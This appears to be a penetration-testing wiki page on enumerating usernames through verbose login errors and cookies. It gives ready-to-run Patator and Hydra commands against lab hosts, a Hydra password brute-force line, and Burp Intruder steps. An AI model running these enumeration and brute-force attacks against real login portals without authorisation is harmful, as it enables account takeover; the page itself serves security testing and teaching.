Username Enumeration

Username Fuzzing (Patator):

#patator //list modules #patator http_fuzz -h Example of the same attack as the burp example1 above. #patator http_fuzz url=http:/some.site/login.php method=POST body='username=FILE0&password=1234' 0=/root/Desktop/usernames.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'

Hydra Method:

If you find a login that gives overly verbose errors at the login portal then we can enumerate the login. In this case we see the "invalid user" message.

From here we pipe the request to Burp to get the full story so we can craft a hydra brute force.

Note how in the request we see on line 1 we have a GET request passing the login data and we have the host that the request is being sent to on line 2.

Then in the response we can see the form data message we saw earlier in the browser.

At this point we can use the following command which in order: passes the username list to use, uses a random password, sets 10 threads, sets the target host, specifies the type of request(in this case its a GET with a form returned), then in quotes passes the param string with variables to inject to, lastly we output the results and also set it to verbose so we can check its functioning correctly.

HTTP Basic Auth can use http-get instead.

hydra -L /usr/share/seclists/Usernames/Names/names.txt -p asdfasdf -t 10 1.lab.auth.site http-get-form "/ajax.php:fun=login&username=^USER^&password=^PASS^:invalid user" -o found.txt -V

patator http_fuzz method=GET url="http://1.lab.auth.site/ajax.php?fun=login&username=FILE0&password=test" 0=users.txt -x ignore:fgrep='invalid user'

While it runs we see that we got a hit!

Once you have a list of users you can then repeat this cycle by then inputting your user-list and the password-list to try.

An example password attack may look like the following:

hydra -L myusers.txt -P password.txt -t 10 -o result-attack.txt
<TARGET> http-get-form "/ajax.php:fun=login&username=^USER^&password=^PASS^:invalid password"

Burp Method:

Spotting a portal to exploit

From Intercept:

In the HTTP history section, rt-clk and send to intruder. Then in the positions tab we can specify which fields we want to enumerate on.

Then using the “Simple LIst” payload we add our wordlist to burp:

Then in the options tab: Go to Grep and clear the current list then add the string you want it to look for.

Then in the redirections section of the options tab make sure to apply the one you need. If you are not sure, do in-scope only.

Now we can start the attack. Then sort the list of tested names by the “invalid” flag since this is referring to the grep search and the top 3 are working usernames in this case:

Example:2 (username enum via cookies) Here we dont get an error printed to the pages html but we do get a “wrong_user” cookie assigned to us. We can use this cookie to validate users.

vs a known user but bad password:

In intruder we add in the request to fuzz with:

Then we add the simple list:

In the grep section we add the string and uncheck the http header exclusion so we can also check the response cookie:

Then in the redirections section of the options tab make sure to apply the one you need. If you are not sure, do in-scope only.

Then start the attack. We then sort by the grep flag to see the results:

PreviousUsername Generation NextInhouse WebApps

Last updated 2 years ago